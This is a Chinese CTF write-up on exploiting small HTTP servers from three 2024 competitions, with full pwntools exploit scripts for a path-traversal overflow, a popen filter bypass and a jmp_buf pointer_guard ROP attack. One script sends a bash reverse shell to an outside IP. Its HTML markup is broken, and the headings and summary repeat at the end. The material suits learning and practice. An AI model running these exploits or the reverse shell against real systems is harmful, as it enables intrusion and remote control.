Web Pwn常见利用方式总结<\/h1>

目录穿越漏洞利用<\/h2>

漏洞原理<\/h3>
当使用%[^ ]<\/code>格式说明符时，如果变量类型为char<\/code>且长度超过255，会导致溢出漏洞<\/li>
利用scandir<\/code>函数扫描..\/<\/code>目录可以访问上级目录中的文件<\/li>
<\/ul>
典型题目<\/h3>
NKCTF2024 httpd题目<\/p>
利用方法<\/h3>

构造超长路径触发溢出<\/li>
通过扫描..\/<\/code>目录获取..\/flag.txt<\/code><\/li>
<\/ol>
EXP示例<\/h3>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>import<\/span> sys
<\/span><\/span>
<\/span><\/span>LOCAL =<\/span> len(sys.<\/span>argv) ==<\/span> 1<\/span>
<\/span><\/span>if<\/span> LOCAL:
<\/span><\/span>    p =<\/span> process('.\/httpd'<\/span>)
<\/span><\/span>else<\/span>:
<\/span><\/span>    p =<\/span> remote(sys.<\/span>argv[1<\/span>], int(sys.<\/span>argv[2<\/span>]))
<\/span><\/span>
<\/span><\/span>p.<\/span>send(b<\/span>'GET \/.'<\/span> +<\/span> b<\/span>'\/'<\/span>*<\/span>256<\/span> +<\/span> b<\/span>'.. HTTP\/1.0<\/span>\r\n<\/span>'<\/span>)
<\/span><\/span>p.<\/span>send(b<\/span>'host: 0.0.0.10<\/span>\r\n<\/span>'<\/span>)
<\/span><\/span>p.<\/span>send(b<\/span>'Content-length: 0<\/span>\r\n<\/span>'<\/span>)
<\/span><\/span>p.<\/span>recvuntil(b<\/span>'.\/flag.txt:'<\/span>)
<\/span><\/span>data =<\/span> p.<\/span>recvline(keepends=<\/span>False<\/span>)
<\/span><\/span>from<\/span> Crypto.Cipher import<\/span> ARC4
<\/span><\/span>print(ARC4.<\/span>new(b<\/span>'reverse'<\/span>).<\/span>decrypt(data))
<\/span><\/span>p.<\/span>close()
<\/span><\/span><\/code><\/pre>基于popen函数的攻击<\/h2>
漏洞原理<\/h3>

popen<\/code>函数可以执行shell命令<\/li>
当存在过滤不严时，可以绕过限制执行任意命令<\/li>
<\/ul>
典型题目<\/h3>
2024羊城杯vhttpd<\/p>
过滤函数分析<\/h3>
_BOOL4 __cdecl<\/span> whitelist<\/span>(const<\/span> char<\/span> *<\/span>a1)
<\/span><\/span>{
<\/span><\/span>    _BOOL4 result; \/\/ eax
<\/span><\/span><\/span><\/span>    char<\/span> needle[3<\/span>]; \/\/ [esp+15h] [ebp-13h] BYREF
<\/span><\/span><\/span><\/span>    char<\/span> v3[4<\/span>]; \/\/ [esp+18h] [ebp-10h] BYREF
<\/span><\/span><\/span><\/span>    unsigned<\/span> int<\/span> v4; \/\/ [esp+1Ch] [ebp-Ch]
<\/span><\/span><\/span><\/span>
<\/span><\/span>    v4 =<\/span> __readgsdword(0x14u<\/span>);
<\/span><\/span>    strcpy(needle, "sh"<\/span>);
<\/span><\/span>    strcpy(v3, "bin"<\/span>);
<\/span><\/span>    if<\/span> (strchr(a1, '&'<\/span>) ||<\/span> strchr(a1, '|'<\/span>) ||<\/span> strchr(a1, ';'<\/span>) ||<\/span> 
<\/span><\/span>        strchr(a1, '$'<\/span>) ||<\/span> strchr(a1, '{'<\/span>) ||<\/span> strchr(a1, '}'<\/span>) ||<\/span> 
<\/span><\/span>        strchr(a1, '`'<\/span>) ||<\/span> strstr(a1, needle))
<\/span><\/span>    {
<\/span><\/span>        result =<\/span> 0<\/span>;
<\/span><\/span>    }
<\/span><\/span>    else<\/span>
<\/span><\/span>    {
<\/span><\/span>        result =<\/span> strstr(a1, v3) ==<\/span> 0<\/span>;
<\/span><\/span>    }
<\/span><\/span>    if<\/span> (v4 !=<\/span> __readgsdword(0x14u<\/span>))
<\/span><\/span>        stack_fail_error();
<\/span><\/span>    return<\/span> result;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>绕过方法<\/h3>

使用"s"h<\/code>拆分敏感字符串<\/li>
利用popen<\/code>执行反弹shell<\/li>
<\/ul>
EXP示例<\/h3>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>context(os=<\/span>'linux'<\/span>, arch=<\/span>'amd64'<\/span>, log_level=<\/span>'debug'<\/span>)
<\/span><\/span>p =<\/span> process("\/home\/zp9080\/PWN\/httpd"<\/span>)
<\/span><\/span>elf =<\/span> ELF("\/home\/zp9080\/PWN\/httpd"<\/span>)
<\/span><\/span>libc =<\/span> elf.<\/span>libc
<\/span><\/span>
<\/span><\/span>host =<\/span> '0.0.0.10'<\/span>
<\/span><\/span>request =<\/span> 'GET \/"s"h HTTP\/1.0<\/span>\r\n<\/span>'<\/span>
<\/span><\/span>request +=<\/span> 'Host: '<\/span> +<\/span> host +<\/span> '<\/span>\r\n<\/span>'<\/span>
<\/span><\/span>request +=<\/span> 'Content-Length: 0<\/span>\r\n<\/span>'<\/span>
<\/span><\/span>
<\/span><\/span>p.<\/span>sendline(request)
<\/span><\/span>p.<\/span>sendline('bash -c "bash -i >& \/dev\/tcp\/172.18.211.41\/7777 0>&1"'<\/span>)
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>基于jmp_buf结构体的攻击<\/h2>
前置知识<\/h3>
jmp_buf结构体<\/h4>

定义在setjmp.h<\/code>头文件中<\/li>
用于保存调用环境（栈指针、指令指针和寄存器等）<\/li>
setjmp()<\/code>保存环境，longjmp()<\/code>恢复环境<\/li>
<\/ul>
pointer_guard保护机制<\/h4>

使用fs:[offsetof(tcbhead_t, pointer_guard)]<\/code>作为key<\/li>
加密过程：rol(ptr ^ pointer_guard, 0x11, 64)<\/code><\/li>
解密过程：ror(enc, 0x11, 64) ^ pointer_guard<\/code><\/li>
<\/ul>
典型题目<\/h3>
DASCTF2024暑期挑战赛 vhttp<\/p>
漏洞分析<\/h3>

content-length<\/code>可控导致栈溢出<\/li>
覆盖jmp_buf<\/code>结构体劫持控制流<\/li>
需要泄露pointer_guard<\/code>才能正确构造payload<\/li>
<\/ol>
利用步骤<\/h3>

第一次请求泄露pointer_guard<\/code><\/li>
第二次请求构造ROP链实现ORW<\/li>
<\/ol>
EXP示例<\/h3>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>context(os=<\/span>'linux'<\/span>, arch=<\/span>'amd64'<\/span>, log_level=<\/span>'debug'<\/span>)
<\/span><\/span>p =<\/span> remote('node5.buuoj.cn'<\/span>, 28360<\/span>)
<\/span><\/span>elf =<\/span> ELF("\/home\/zp9080\/PWN\/pwn"<\/span>)
<\/span><\/span>libc =<\/span> elf.<\/span>libc
<\/span><\/span>
<\/span><\/span>def<\/span> circular_left_shift<\/span>(value, shift):
<\/span><\/span>    value &=<\/span> 0xFFFFFFFFFFFFFFFF<\/span>
<\/span><\/span>    shifted_value =<\/span> ((value <<<\/span> shift) &<\/span> 0xFFFFFFFFFFFFFFFF<\/span>) |<\/span> (value >><\/span> (64<\/span> -<\/span> shift))
<\/span><\/span>    return<\/span> shifted_value
<\/span><\/span>
<\/span><\/span>def<\/span> ptr_g<\/span>(value, pg):
<\/span><\/span>    val =<\/span> value ^<\/span> pg
<\/span><\/span>    return<\/span> circular_left_shift(val, 0x11<\/span>)
<\/span><\/span>
<\/span><\/span># 第一次请求泄露pointer_guard<\/span>
<\/span><\/span>header =<\/span> b<\/span>"GET \/ HTTP\/1.1<\/span>\r\n<\/span>"<\/span>
<\/span><\/span>header +=<\/span> b<\/span>"content-length:2848<\/span>\r\n<\/span>"<\/span>
<\/span><\/span>p.<\/span>send(header)
<\/span><\/span>p.<\/span>send('<\/span>\n<\/span>'<\/span>)
<\/span><\/span>
<\/span><\/span>payload =<\/span> b<\/span>'<\/span>\r\n<\/span>'<\/span> +<\/span> b<\/span>"user=newbew"<\/span> +<\/span> cyclic(2848<\/span> -<\/span> 13<\/span> -<\/span> 7<\/span>) +<\/span> b<\/span>'success'<\/span>
<\/span><\/span>p.<\/span>send(payload)
<\/span><\/span>p.<\/span>recvuntil(b<\/span>"success"<\/span>)
<\/span><\/span>pointer_guard =<\/span> u64(p.<\/span>recv(8<\/span>))
<\/span><\/span>print("Pointer guard:"<\/span>, hex(pointer_guard))
<\/span><\/span>
<\/span><\/span># 第二次请求构造ROP<\/span>
<\/span><\/span>ret_addr =<\/span> 0x000000000040101a<\/span>
<\/span><\/span>pop_rdi =<\/span> 0x00000000004028f3<\/span>
<\/span><\/span>pop_rsi_r15 =<\/span> 0x00000000004028f1<\/span>
<\/span><\/span>pop_rdx =<\/span> 0x000000000040157d<\/span>
<\/span><\/span>buffer =<\/span> 0x0405140<\/span>
<\/span><\/span>open_plt =<\/span> 0x4013C0<\/span>
<\/span><\/span>read_plt =<\/span> 0x401300<\/span>
<\/span><\/span>write_plt =<\/span> 0x4012A0<\/span>
<\/span><\/span>flag_addr =<\/span> 0x40338A<\/span>
<\/span><\/span>
<\/span><\/span>rop_payload =<\/span> b<\/span>"a"<\/span>*<\/span>(0x20<\/span> -<\/span> 1<\/span>) +<\/span> b<\/span>":"<\/span>
<\/span><\/span>rop_payload +=<\/span> p64(ret_addr)*<\/span>0x4<\/span>
<\/span><\/span>rop_payload +=<\/span> p64(pop_rdi)
<\/span><\/span>rop_payload +=<\/span> p64(flag_addr)
<\/span><\/span>rop_payload +=<\/span> p64(pop_rsi_r15)
<\/span><\/span>rop_payload +=<\/span> p64(0x0<\/span>)
<\/span><\/span>rop_payload +=<\/span> p64(0x0<\/span>)
<\/span><\/span>rop_payload +=<\/span> p64(open_plt)
<\/span><\/span>rop_payload +=<\/span> p64(pop_rdi)
<\/span><\/span>rop_payload +=<\/span> p64(0x3<\/span>)
<\/span><\/span>rop_payload +=<\/span> p64(pop_rsi_r15)
<\/span><\/span>rop_payload +=<\/span> p64(buffer+<\/span>0x100<\/span>)
<\/span><\/span>rop_payload +=<\/span> p64(0x0<\/span>)
<\/span><\/span>rop_payload +=<\/span> p64(pop_rdx)
<\/span><\/span>rop_payload +=<\/span> p64(0x200<\/span>)
<\/span><\/span>rop_payload +=<\/span> p64(read_plt)
<\/span><\/span>rop_payload +=<\/span> p64(pop_rdi)
<\/span><\/span>rop_payload +=<\/span> p64(0x1<\/span>)
<\/span><\/span>rop_payload +=<\/span> p64(pop_rsi_r15)
<\/span><\/span>rop_payload +=<\/span> p64(buffer+<\/span>0x100<\/span>)
<\/span><\/span>rop_payload +=<\/span> p64(0x0<\/span>)
<\/span><\/span>rop_payload +=<\/span> p64(write_plt)
<\/span><\/span>rop_payload +=<\/span> rop_payload.<\/span>ljust(0x100<\/span>, b<\/span>"a"<\/span>)
<\/span><\/span>
<\/span><\/span>payload =<\/span> b<\/span>"&pass=v3rdant"<\/span>.<\/span>ljust(0x200<\/span>, b<\/span>'a'<\/span>)
<\/span><\/span>regs =<\/span> flat({
<\/span><\/span>    0x8<\/span>: ptr_g(buffer+<\/span>0x28<\/span>, pointer_guard),  # rbp<\/span>
<\/span><\/span>    0x30<\/span>: ptr_g(buffer+<\/span>0x28<\/span>, pointer_guard), # rsp<\/span>
<\/span><\/span>    0x38<\/span>: ptr_g(ret_addr, pointer_guard)     # rdx<\/span>
<\/span><\/span>})
<\/span><\/span>payload +=<\/span> regs
<\/span><\/span>payload =<\/span> payload.<\/span>ljust(2848<\/span> -<\/span> 0x20<\/span>, b<\/span>'a'<\/span>)
<\/span><\/span>payload +=<\/span> p64(buffer+<\/span>0x400<\/span>)*<\/span>4<\/span>
<\/span><\/span>
<\/span><\/span>p.<\/span>send(payload)
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>调试技巧<\/h2>
多线程调试<\/h3>

使用info threads<\/code>查看所有线程<\/li>
使用thread (id)<\/code>切换线程<\/li>
在关键函数处设置断点<\/li>
<\/ol>
调试脚本示例<\/h3>
gdb_script =<\/span> '''
<\/span><\/span><\/span>b pthread_create
<\/span><\/span><\/span>c
<\/span><\/span><\/span>finish
<\/span><\/span><\/span>thread 2
<\/span><\/span><\/span>b *0x401EC2
<\/span><\/span><\/span>c
<\/span><\/span><\/span>b __pthread_cleanup_upto
<\/span><\/span><\/span>c
<\/span><\/span><\/span>'''<\/span>
<\/span><\/span><\/code><\/pre>常见问题解决<\/h2>
段错误问题<\/h3>

原因：覆盖了fs:[0x10]<\/code>的值<\/li>
解决：保证fs:[0x10]<\/code>指向可写地址<\/li>
<\/ul>
jmp_buf结构体控制<\/h3>

rdi<\/code>指向jmp_buf<\/code>结构体<\/li>
r8 = [jmp_buf+0x30]<\/code><\/li>
r9 = [jmp_buf+0x8]<\/code><\/li>
rdx = [jmp_buf+0x38]<\/code><\/li>
最终执行：mov rsp,r8; mov rbp,r9; jmp rdx<\/code><\/li>
<\/ul>
总结<\/h2>
Web Pwn常见利用方式包括：<\/p>

目录穿越漏洞<\/li>
命令注入绕过<\/li>
结构体劫持控制流

关键点在于发现初始漏洞点，并利用程序特性构造有效payload。<\/li>
<\/ol>
Web Pwn常见利用方式总结<\/h1>

目录穿越漏洞利用<\/h2>

典型题目<\/h3> NKCTF2024 httpd题目<\/p>

基于popen函数的攻击<\/h2>

典型题目<\/h3> 2024羊城杯vhttpd<\/p>

基于jmp_buf结构体的攻击<\/h2>

前置知识<\/h3>

典型题目<\/h3> DASCTF2024暑期挑战赛 vhttp<\/p>

调试技巧<\/h2>

常见问题解决<\/h2>

总结<\/h2> Web Pwn常见利用方式包括：<\/p> 目录穿越漏洞<\/li> 命令注入绕过<\/li> 结构体劫持控制流 关键点在于发现初始漏洞点，并利用程序特性构造有效payload。<\/li> <\/ol>

典型题目<\/h3>
NKCTF2024 httpd题目<\/p>

典型题目<\/h3>
2024羊城杯vhttpd<\/p>

典型题目<\/h3>
DASCTF2024暑期挑战赛 vhttp<\/p>

总结<\/h2>
Web Pwn常见利用方式包括：<\/p>

目录穿越漏洞<\/li>
命令注入绕过<\/li>
结构体劫持控制流
关键点在于发现初始漏洞点，并利用程序特性构造有效payload。<\/li> <\/ol>
